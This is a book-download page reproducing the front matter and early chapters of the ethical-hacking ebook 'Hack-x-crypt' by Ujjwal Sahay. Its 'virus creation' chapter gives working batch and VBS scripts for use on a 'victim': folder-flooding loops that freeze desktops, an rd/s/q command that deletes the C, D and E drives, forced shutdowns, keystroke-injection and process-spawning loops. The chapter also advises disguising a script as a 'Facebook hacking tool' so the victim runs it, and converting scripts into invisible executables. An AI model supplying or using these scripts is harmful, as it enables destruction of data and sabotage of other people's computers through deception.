Hack-x-crypt: A Straight Forward Guide Towards Ethical Hacking And Cyber Security by Ujjwal Sahay


35568dd309a4083-261x361.jpg Author Ujjwal Sahay
Isbn
File size 21.6 Mb
Year 2015
Pages 106
Language English
File format PDF
Category security


 

BY: UJJWAL SAHAY CO-FOUNDER [www.thebigcomputing.com] FIND OUT MORE STUFF LIKE THIS ON TheBigComputing.com We cover unique Ethical Hacking and Performance improvement guides, News and Tutorials. Our aim is to make your digital life easy, pleasant and secure. Ujjwal is a regular author and also chief security administrator at the place, you can get solution of your queries LEGAL DISCLAIMER Any proceedings or activities regarding the material contained within this volume are exclusively your liability. The misuse and mistreat of the information/tutorial in this book can consequence in unlawful charges brought against the persons in question. The authors and review analyzers will not be held responsible in the event any unlawful charges brought against any individuals by misusing the information in this book to break the law. This book contains material and resources that can be potentially destructive or dangerous. If you do not fully comprehend something on this book, don‘t study this book. Please refer to the laws and acts of your state/region/ province/zone/territory or country before accessing, using, or in any other way utilizing these resources. These materials and resources are for educational and research purposes only. Do not attempt to violate the law with anything enclosed here within. If this is your intention, then leave now. Neither writer of this book, review analyzers, the publisher, nor anyone else affiliated in any way, is going to admit any responsibility for your proceedings, actions or trials. ABOUT THE AUTHOR… UJJWAL SAHAY is a sovereign Computer Security Consultant and has state-of-the-art familiarity in the field of computer. Also, UJJWAL SAHAY is a cyber-security expert certified by LUCIDEUS TECH and has definitive experience in the field of computers and ethical hacking. Ujjwal Sahay is the Author of the book HACK-X CRYPT (A straight forward guide towards Ethical hacking and cyber security). Also, Ujjwal Sahay is the Co-founder of the techno-hacking website www.thebigcomputing.com, he is the chief security consultant of site. Sahay is however, more well known for his significant work in the field of ethical hacking and cyber security. Sahay is currently pursuing his studies in computer science with specialization in cyber security at MITS GWALIOR. Get In Touch With Him At [email protected] PREFACE Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator‘s original intention. People who slot in computer hacking actions and activities are often entitled as hackers. The majority of people assume that hackers are computer criminals. They fall short to identify the fact that criminals and hackers are two entirely unrelated things. Hackers in realism are good and extremely intelligent people, who by using their knowledge in a constructive mode help organizations, companies, government, etc. to secure credentials and secret information on the Internet. Years ago, no one had to worry about Crackers breaking into their computer and installing Trojan viruses, or using your computer to send attacks against others. Now that thing have changed, it’s best to be aware of how to defend your computer from damaging intrusions and prevent black hat hackers. So, in this Book you will uncover the finest ways to defend your computer systems from the hackers This Book is written by keeping one object in mind that a beginner, who is not much familiar regarding computer hacking, can easily, attempts these hacks and recognize what we are trying to demonstrate. After Reading this book you will come to recognize that how Hacking is affecting our everyday routine work and can be very hazardous in many fields like bank account hacking etc. Moreover, after carrying out this volume in detail you will be capable of understanding that how a hacker hacks and how you can defend yourself from these threats. FOR ANY QUERIES AND SUGGESTIONS FEEL FREE TO CONTACT ME: [email protected] In The Loving Memory of my DAD Your hands so warm Your voice so clear I still remember your laughter Like yesterday had never gone I miss your words of encouragement Words that kept me hanging on Now you are gone The tears keep flowing Only hoping That one day the pain will fade Dad why did you have to go away We love you and miss you I know I will again see you someday ACKNOWLEDGEMENTS… Book or volume of this temperament is tremendously complex to write, particularly without support of the Almighty GOD. I am highly thankful to LATE DR. BAKSHI KAMESHWAR SRIVASTAVA, MRS. SHASHI BALA SRIVASTAVA, Mr. BAKSHI RAJESH PRASAD SINHA AND MRS. ARADHNA SINHA to trust on my capabilities, without their support and motivation it would not be promising to write this book. I express heartfelt credit to My Parents LATE PROF. SAMIR KUMAR SAHAY and MRS.SUMAN SAHAY without them I have no existence. I am also thanking MR. BAKSHI RAJEEV PRASAD SINHA, MRS. ANITA SINHA, MR. BAKSHI SANJEEV PRASAD SINHA, MRS.PRITY SINHA, MR. RAJESHWAR PRASAD and MRS. PUNAM SINHA who helped me at each and every step of my life by their precious support. I am more than ever thankful to my colleague Saurabh Tripathi (Creative head @ THE BIG COMPUTING) for the review, analysis and suggestions for some good articles for this book and all individuals who facilitated me at various research stages of this volume. UJJWAL SAHAY FOOLISH ASSUMPTIONS… I make a few assumptions about you: You’re familiar with basic computer-, networking– related concepts and terms. You have a basic understanding of what hackers and malicious users do. You have access to a computer and a network on which to use these techniques. You have access to the Internet to obtain the various tools used in the ethical hacking process. You have permission to perform the hacking techniques described in this book. Table of Contents INTRODUCTION TO HACKERS…………………………………………………………….. 17 Communities of Hackers:- ……………………………………………………………….. 17 INTENSION OF HACKERS: ………………………………………………………………… 17 Types of Hackers: ………………………………………………………………………………. 18 •White Hat Hackers ………………………………………………………………………….. 18 •Black Hat Hackers …………………………………………………………………………… 18 •Grey Hat Hackers…………………………………………………………………………….. 18 CRACKERS………………………………………………………………………………………… 19 Intension of crackers:- ……………………………………………………………………… 19 PHREAKS…………………………………………………………………………………………… 19 Intention of phreaks:-……………………………………………………………………….. 19 SCRIPT KIDDIES: ……………………………………………………………………………… 20 Intention of script kiddies:-………………………………………………………………. 20 Black Hat Hackers Strategy:- …………………………………………………………… 20 HACKERS WANT YOUR PC………………………………………………………………….. 23 CREATION OF VIRUS IN NOTEPAD …………………………………………………….. 26 1.) To create a huge amount of folders on victim’s desktop screen: ……………………………………………………………………………………………………… 26 2.) To create more folders in C, D, and E drive of victim’s computer: ……………………………………………………………………………………………………… 29 3.) To format C, D: and E: drive of your computer:-………………………… 30 4.) Convey your friend a little message and shut down his / her computer:…………………………………………………………………………………………. 30 5.) Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:- ……………………………………………………………….. 31 6.) Hack your friend’s keyboard and make him type “You are a fool” simultaneously:……………………………………………………………………………….. 33 7.) Open Notepad continually in your friend’s computer:………………. 33 8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH …………….. 34 Convert Batch files into Executable Programs………………………………….. 37 HACKING “OPEN” OPTION ………………………………………………………………….. 42 PASSWORD CRACKING ……………………………………………………………………….. 50 Cracking passwords with hardcore tools………………………………………… 51 Password-cracking software:- ………………………………………………………… 51 Cain & Abel: ………………………………………………………………………………………. 51 Brutus:………………………………………………………………………………………………. 52 Elcomsoft Distributed Password Recovery: …………………………………… 52 Elcomsoft System Recovery:……………………………………………………………. 52 John the Ripper ………………………………………………………………………………….. 52 ophcrack …………………………………………………………………………………………….. 53 Aircrack-NG ……………………………………………………………………………………….. 53 Proactive System Password Recovery……………………………………………. 53 Rainbow Crack …………………………………………………………………………………… 53 pwdump3 …………………………………………………………………………………………… 54 PASSWORD CREATING POLICIES……………………………………………………….. 57 BYPASS WINDOWS LOGON SCREEN PASSWORD……………………………. 60 KEYSTROKE LOGGING …………………………………………………………………………. 63 Learn How to Hack Windows Experience Index………………………………… 66 HACK TO HIDE LOCAL DRIVES ……………………………………………………………. 71 FORMAT HARD DISK WITH NOTEPAD ………………………………………………. 78 FUNNY VIRUS TO SHOCK YOUR FRIENDS…………………………………………. 81 HOW TO CHANGE YOUR PROCESSOR NAME …………………………………… 85 HOW TO MAKE YOUR GOOGLE SEARCHS EFFECTIVE……………………… 93 IOS PASSWORD CRACKING…………………………………………………………………. 96 HACK TO HIDE THE RECYCLE BIN……………………………………………………..103 HOW BOTNET DDoS ATTACK WORKS……………………………………………… 106 DDoS Attack? ……………………………………………………………………………………106 Botnet? ……………………………………………………………………………………………..107 Botnet Tools……………………………………………………………………………………..108 SlowLoris…………………………………………………………………………………………..1 Tor’s Hammer …………………………………………………………………………………..109 Qslowloris …………………………………………………………………………………………109 Apache Killer……………………………………………………………………………………..110 PyLoris ……………………………………………………………………………………………… 110 DDoSim ……………………………………………………………………………………………..110 Botnet DDoS Attacks……………………………………………………………………….110 WEBSITE HACKING……………………………………………………………………………..113 TESTING SQL INJECTION BY USING TOOL ………………………………………..130 WI-FI HACKING USING BACKTRACK………………………………………………….134 NEWBIE’S WAY TOWARDS REVERSE ENGINEERING ……………………..143 EMAIL AND FACEBOOK HACKING BY PHISHING……………………………..149 Securing Pen Drives From Malicious Viruses……………………………………155 HOW TO PROTECT YOUR PDF FILES FROM COPYING…………………….160 SENDING A MESSAGE TO OTHER USER IN YOUR PC ……………………..166 HOW TO CREATE A FOLDER WITH EMPTY NAME…………………………..170 HACKING ANDROID PHONE……………………………………………………………….173 FULL CONTROL YOUR PC BY PHONE………………………………………………..178 LAUNCHING WINDOWS GOD MODE ………………………………………………… 183 HOW TO CRACK ANDROID LOCK SCREEN………………………………………..187 WI-FI CRACKING USING REAVER IN BACKTRACK ……………………………191 SOME USEFUL WINDOWS SHORTCUTS …………………………………………..196 HOW TO RECOVER PERMANENTLY DELETED FILES………………………198 CONCLUSION: ……………………………………………………………………………………203 Let’s start INTRODUCTION INTRODUCTION TO HACKERS First of all before digging into intense hacking processes let’s take a look on what hacking is, who the hackers are, what are their intentions, types of hackers and their communities etc. Communities of Hackers: HACKERS CRACKERS PHREAKS SCRIPT KIDDIES HACKERS are the Intelligent Computer Experts. INTENSION OF HACKERS: •To gain in-depth knowledge of any computer system, what is happening at the backend of any specific program of the system behind the screen of the computer system? • Their motive is to find possible security risk and vulnerabilities in a computer system or network. •They create security awareness among the people by sharing knowledge and proper security preventions that should be taken by the user. Types of Hackers: •White Hat Hackers –“White hats” is the name used for security experts. While they often use the same tools and techniques as the black hats, they do so in order to foil the bad guys. That is, they use those tools for ethical hacking and computer forensics. Ethical hacking is the process of using security tools to test and improve security (rather than to break it!). Computer forensics is the process of collecting evidence needed to identify and convict computer criminals. •Black Hat Hackers –They use their knowledge and skill set for illegal activities and destructive intents. Obviously, the “black hats” are the bad guys. These are the people who create and send viruses and worms, break into computer systems, steal data, shut down networks, and basically commit electronic crimes. We talk about black hats at several points in this book. Black hat hackers and malware writers are not considered as the same thing in the security community—even though they are both breaking the law. •Grey Hat Hackers They use their knowledge and skill set for the legal and illegal purpose. They are white hats in public but internally they do some black hat work. Gray hats sit in the middle of the fence because sometimes they cross that ethical line (or more often, define it differently). For example, gray hats will break into a company’s computer system just to wander around and see what’s there. They think that simply because they don’t damage any data, they’re not committing a crime. Then they go and apply for jobs as security consultants for large corporations. They justify their earlier break-in as some sort of computer security training. Many really believe that they’re providing a public service by letting companies know that their computers are at risk. CRACKERS are those who break into the applications with some malicious intentions either for their personal gain or their greedy achievements. Intension of crackers: • Their motive is to get unauthorized access into a system and cause damage or destroy or reveal confidential information. •To compromise the system to deny services to legitimate users for troubling, harassing them or for taking revenge. •It can cause financial losses & image/reputation damages, defamation in the society for individuals or organizations. PHREAKS are those people who use computer devices and software programs and their tricky and sharp mind to break into the phone networks. Intention of phreaks: •To find loopholes in security in phone network and to make phone calls and access internet at free of cost!!! You may get a spoofed call or a big amount of bill. You can also get a call with your own number. SCRIPT KIDDIES: These are computer novices who take advantage of the hacker tools, vulnerability scanners, and documentation available free on the Internet but who don’t have any real knowledge of what’s really going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys are the stereotypical hackers that you hear about in the news media, they often need only minimal skills to carry out their attacks. Intention of script kiddies: •They use the available information about known vulnerabilities to break into the network systems. •It’s an act performed for a fun or out of curiosity. Black Hat Hackers Strategy: •Information Gathering & Scanning •Getting Access on the website •Maintain the access •Clear the Tracks Conclusion: Security is important because prevention is better than cure. HACKERS WANT YOUR PC HACKERS WANT YOUR PC… You might be thinkingthathackers don’t careabout your computer,but they do. Hackers want access to your system for many different reasons. Remember, once a hacker breaks in and plants a Trojan, the door is open for anyone to return. The hackers know this and are making money off from it. They know it’s easy to hide and very difficult to track them back once they own your PC. Overall, the Internet is an easy place to hide. Compromised computers around the world have helped to make hiding simple. It is easy to find the last IP address from where an attack was launched, but hackers hop from many unsecured systems to hide their location before they launch attacks. IP address is a unique address that identifies where a computer is connected to the Internet. Every computer, even yours if you’re using broadband access, has an Internet protocol (IP) address. Over the past four years, most cyber-attacks have been launched from computers within the INDIA. However, this doesn’t mean that systems in the INDIA are the original source of the attack. A hacker in Pakistan could actually use your computer to launch a denial of service (DOS) attack. To the entire world, it might even look as if you started the attack because the hacker has hidden his tracks so that only the last “hop” can be traced . VIRUS CREATIONS CREATION OF VIRUS IN NOTEPAD Now, it’s time to administrate your computer by creating some viruses in the form of batch file. You can create various types of viruses with havingdistinct functionality. Eachandeveryviruswill affect thevictim’s computer system by the way you have coded its programming in the batch file. You can create viruses which can freeze the victim’s computer or it can also crash it. Virus creation codes of the batch file:—Codes to be written in the notepad—Extension of the files should be “.bat” 1.) To create a huge amount of folders on victim’s desktop screen: First of all your task is to copy the following codes in the notepad of your computer. For opening the notepad: Go to run option of your computer by pressing “window+R”. Simply type “notepad” and click on the OK option. CODES: @echo off :top md%random% goto top. Now when you have copied the codes in the notepad your next work is to save the text document you have created. Go to fileoptionandsave your document by any namebut“don’tforget to keep the extension as ‘.bat’. For example you can save your text document by the name“ujjwal.bat” Or you can also keep your document name as “Facebook hacking tool.bat” to confuse the victim and enforce him to open the virus you have created to destroy the desktop of the victim. When you have done saving the document just double click on the batch file to open it. Suddenly you will see that the command prompt of the victim’s computer opened automatically and it will display large amount of codes to running in the command prompt. After 5-10 seconds you will see that there are a huge amount of folders created automatically on the desktop of the victim and it will also leads the desktop to freeze or crash. 2.) To create more folders in C, D, and E drive of victim’s computer:As we have learned above to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victims computer by applying the same method as we have followed above but there is a little amendment in the codes of the batch file of this virus. CODES: @echo off :VIRUS cd /d C: md%random% cd /d D: md%random% cd /d E: md%random% goto VIRUS Copy and paste the above code in the notepad and follow the same steps as we have followed before to create more numbers of folders in the local drives of the victim’s computer. 3.) To format C, D: and E: drive of your computer: Open Notepad Copy the below command there “rd/s/q D:\ rd/s/q C:\ rd/s/q E:" (Without quotes) Save as “anything.bat Double click on the virus icon. This virus formats the C, D and E Drive in 5 Seconds. 4.) Convey your friend a little message and shut down his / her computer: @echo off msg * I don’t like you shutdown -c “Error! You are too stupid!” -s Save it as “Anything.BAT” in All Files and send it. 5.) Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out: Open the notepad and type the following code : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.Run “notepad” WScript.Sleep 100 WshShell.AppActivate “Notepad” WScript.Sleep 500 WshShell.SendKeys “Hel” WScript.Sleep 500 WshShell.SendKeys “lo “ WScript.Sleep 500 WshShell.SendKeys “, ho” WScript.Sleep 500 WshShell.SendKeys “w a” WScript.Sleep 500 WshShell.SendKeys “re “ WScript.Sleep 500 WshShell.SendKeys “you” WScript.Sleep 500 WshShell.SendKeys “? ” WScript.Sleep 500 WshShell.SendKeys “I a” WScript.Sleep 500 WshShell.SendKeys “m g” WScript.Sleep 500 WshShell.SendKeys “ood” WScript.Sleep 500 WshShell.SendKeys ” th” WScript.Sleep 500 WshShell.SendKeys “ank” WScript.Sleep 500 WshShell.SendKeys “s! “ Save it as “Anything.VBS” and send it. 6.) Hack your friend’s keyboard and make him type “You are a fool” simultaneously: Open the notepad and type the following codes: Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “You are a fool.” loop Save it as “Anything.VBS” and send it. 7.) Open Notepad continually in your friend’s computer: Open the notepad and type the following codes: @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save it as “Anything.BAT” and send it. 8.) THRETEN YOUR FRIEND BY MAKING SCREEN FLASH To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file. @echo off echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg echo q>>\z.dbg debug <\z.dbg>nul del \z.dbg But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE. Codes: @echo off :a echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg echo g=100>>\z.dbg echo q>>\z.dbg debug <\z.dbg>nul del \z.dbg goto a To disable error (ctrl+shirt+esc) then end process wscript.exe Enjoy!!! Note: - some of the above given codes can harm your computer after execution so; don’t try it on your pc. You can use a test computer for it. BATCH TO EXE CONVERSION Convert Batch files into Executable Programs The batch files and the executable files work in almost similar way. Basically both are as much as a set of instructions and logics for the command execution. But more preferably we treat executable files as they are more convenient than batch one. But why would we want that? Some of the reasons are listed below: 1. We can include extra tools in our EXE dependent batch file. 2. Moreover EXE provides protection to the source script to restrict modification. 3. EXE files can be pinned to windows start menu as well as in the task bar. Here weare usinga tool called“Batchtoexe converter” whichprovides you a platform to run the batch files as executable files. You can download it from here “Bat to ExeConverter” is a flow conversionprogram whose purpose is to help you to easily obtain executable files out of batch items. If you prefer to convert a BATCH file into an executable one easily, “Bat to ExeConverter” is a simple and yet effective solution. The application provides you with a simplified interface, which makes it comfortable for both beginner and advanced users. From its primary window, you have the ability to select the desired batch file and output file. Then, you will be able to customize your settings according to your choice and preferences. Another interesting and compactible feature is that you can choose the language for your EXE file, the choices being English or German. From the Options tab, users can opt to create a visible or invisible application, which means displaying a console window or not. However, if you want to encrypt the resulting EXE file, you can protect it with a security password.

Author Ujjwal Sahay Isbn File size 21.6 Mb Year 2015 Pages 106 Language English File format PDF Category Security Book Description: FacebookTwitterGoogle+TumblrDiggMySpaceShare This is basically a straight forward guide towards ethical hacking and cyber security.Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator‘s original intention. People who slot in computer hacking actions and activities are often entitled as hackers. The majority of people assume that hackers are computer criminals. They fall short to identify the fact that criminals and hackers are two entirely unrelated things.     Download (21.6 Mb) HACKING: Beginner’s Guide to Computer Hacking. Learn to Protect Your System Hacking: A Beginners’ Guide to Computer Hacking, Basic Security and Penetration Testing The Cyber Pirates: A Comprehensive Guide To The Internet From A Hacker’s Eye The Cyber Pirates: A comprehensive guide to the internet from a hacker’s eye Computer Hacking: The Essential Hacking Guide For Beginners Load more posts

Leave a Reply

Your email address will not be published. Required fields are marked *